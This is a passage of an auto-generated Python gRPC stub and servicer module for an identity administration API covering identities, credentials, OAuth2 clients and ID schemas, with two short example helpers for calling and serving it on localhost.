response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaResponse.FromString,
)
self.GetIdSchemas = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchemas',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasResponse.FromString,
)
self.GetIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaResponse.FromString,
)
self.GetDefaultIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetDefaultIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaResponse.FromString,
)
self.UpdateIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaResponse.FromString,
)
self.MarkDefaultIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/MarkDefaultIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaResponse.FromString,
)
self.DeleteIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaResponse.FromString,
)
self.CreateOAuth2Client = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/CreateOAuth2Client',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientResponse.FromString,
)
self.GetOAuth2Clients = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetOAuth2Clients',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsResponse.FromString,
)
self.UpdateOAuth2Client = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateOAuth2Client',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientResponse.FromString,
)
self.DeleteOAuth2Client = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/DeleteOAuth2Client',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientResponse.FromString,
)
self.GetEmailsSetup = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetEmailsSetup',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupResponse.FromString,
)
self.UpdateEmailsSetup = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateEmailsSetup',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupResponse.FromString,
)
self.GetUserBaseStatistics = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetUserBaseStatistics',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsResponse.FromString,
)
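# Illustrative sketch (editor's addition; this module is generated, so such helpers
# would not normally live here): calling the Admin service through the stub. The
# endpoint address is hypothetical and the request is left empty for brevity.
def _example_admin_stub_call():
    channel = grpc.insecure_channel('localhost:50051')
    stub = AdminStub(channel)
    request = devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesRequest()
    return stub.GetIdentities(request)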
class AdminServicer(object):
"""Missing associated documentation comment in .proto file."""
def CreateIdentity(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdentity(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdentitiesByAttribute(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdentities(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateIdentity(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteIdentity(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetAddresses(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetAddress(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateAddress(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetTraits(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateTraits(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetCredentials(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateCredential(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdentityLoginAttempts(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateConnection(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetConnections(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateConnection(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteConnection(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdSchemas(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetDefaultIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MarkDefaultIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteIdSchema(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateOAuth2Client(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetOAuth2Clients(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateOAuth2Client(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteOAuth2Client(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetEmailsSetup(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateEmailsSetup(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetUserBaseStatistics(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AdminServicer_to_server(servicer, server):
rpc_method_handlers = {
'CreateIdentity': grpc.unary_unary_rpc_method_handler(
servicer.CreateIdentity,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityResponse.SerializeToString,
),
'GetIdentity': grpc.unary_unary_rpc_method_handler(
servicer.GetIdentity,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityResponse.SerializeToString,
),
'GetIdentitiesByAttribute': grpc.unary_unary_rpc_method_handler(
servicer.GetIdentitiesByAttribute,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeResponse.SerializeToString,
),
'GetIdentities': grpc.unary_unary_rpc_method_handler(
servicer.GetIdentities,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesResponse.SerializeToString,
),
'UpdateIdentity': grpc.unary_unary_rpc_method_handler(
servicer.UpdateIdentity,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityResponse.SerializeToString,
),
'DeleteIdentity': grpc.unary_unary_rpc_method_handler(
servicer.DeleteIdentity,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityResponse.SerializeToString,
),
'GetAddresses': grpc.unary_unary_rpc_method_handler(
servicer.GetAddresses,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesResponse.SerializeToString,
),
'GetAddress': grpc.unary_unary_rpc_method_handler(
servicer.GetAddress,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressResponse.SerializeToString,
),
'UpdateAddress': grpc.unary_unary_rpc_method_handler(
servicer.UpdateAddress,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressResponse.SerializeToString,
),
'GetTraits': grpc.unary_unary_rpc_method_handler(
servicer.GetTraits,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsResponse.SerializeToString,
),
'UpdateTraits': grpc.unary_unary_rpc_method_handler(
servicer.UpdateTraits,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsResponse.SerializeToString,
),
'GetCredentials': grpc.unary_unary_rpc_method_handler(
servicer.GetCredentials,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsResponse.SerializeToString,
),
'UpdateCredential': grpc.unary_unary_rpc_method_handler(
servicer.UpdateCredential,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialResponse.SerializeToString,
),
'GetIdentityLoginAttempts': grpc.unary_unary_rpc_method_handler(
servicer.GetIdentityLoginAttempts,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsResponse.SerializeToString,
),
'CreateConnection': grpc.unary_unary_rpc_method_handler(
servicer.CreateConnection,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionResponse.SerializeToString,
),
'GetConnections': grpc.unary_unary_rpc_method_handler(
servicer.GetConnections,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsResponse.SerializeToString,
),
'UpdateConnection': grpc.unary_unary_rpc_method_handler(
servicer.UpdateConnection,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionResponse.SerializeToString,
),
'DeleteConnection': grpc.unary_unary_rpc_method_handler(
servicer.DeleteConnection,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionResponse.SerializeToString,
),
'CreateIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.CreateIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaResponse.SerializeToString,
),
'GetIdSchemas': grpc.unary_unary_rpc_method_handler(
servicer.GetIdSchemas,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasResponse.SerializeToString,
),
'GetIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.GetIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaResponse.SerializeToString,
),
'GetDefaultIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.GetDefaultIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaResponse.SerializeToString,
),
'UpdateIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.UpdateIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaResponse.SerializeToString,
),
'MarkDefaultIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.MarkDefaultIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaResponse.SerializeToString,
),
'DeleteIdSchema': grpc.unary_unary_rpc_method_handler(
servicer.DeleteIdSchema,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaResponse.SerializeToString,
),
'CreateOAuth2Client': grpc.unary_unary_rpc_method_handler(
servicer.CreateOAuth2Client,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientResponse.SerializeToString,
),
'GetOAuth2Clients': grpc.unary_unary_rpc_method_handler(
servicer.GetOAuth2Clients,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsResponse.SerializeToString,
),
'UpdateOAuth2Client': grpc.unary_unary_rpc_method_handler(
servicer.UpdateOAuth2Client,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientResponse.SerializeToString,
),
'DeleteOAuth2Client': grpc.unary_unary_rpc_method_handler(
servicer.DeleteOAuth2Client,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientResponse.SerializeToString,
),
'GetEmailsSetup': grpc.unary_unary_rpc_method_handler(
servicer.GetEmailsSetup,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupResponse.SerializeToString,
),
'UpdateEmailsSetup': grpc.unary_unary_rpc_method_handler(
servicer.UpdateEmailsSetup,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupResponse.SerializeToString,
),
'GetUserBaseStatistics': grpc.unary_unary_rpc_method_handler(
servicer.GetUserBaseStatistics,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'depot.devtools.auth.v0.identity.admin.Admin', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
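# Illustrative sketch (editor's addition; generated module, shown for context only):
# serving a concrete AdminServicer subclass. The worker count and port are hypothetical.
def _example_serve(servicer):
    from concurrent import futures
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))
    add_AdminServicer_to_server(servicer, server)
    server.add_insecure_port('[::]:50051')
    server.start()
    server.wait_for_termination()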
# This class is part of an EXPERIMENTAL API.
class Admin(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def CreateIdentity(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateIdentity',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdentity(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentity',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdentitiesByAttribute(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentitiesByAttribute',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdentities(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentities',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateIdentity(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdentity',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteIdentity(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdentity',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetAddresses(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetAddresses',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetAddress(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetAddress',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateAddress(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
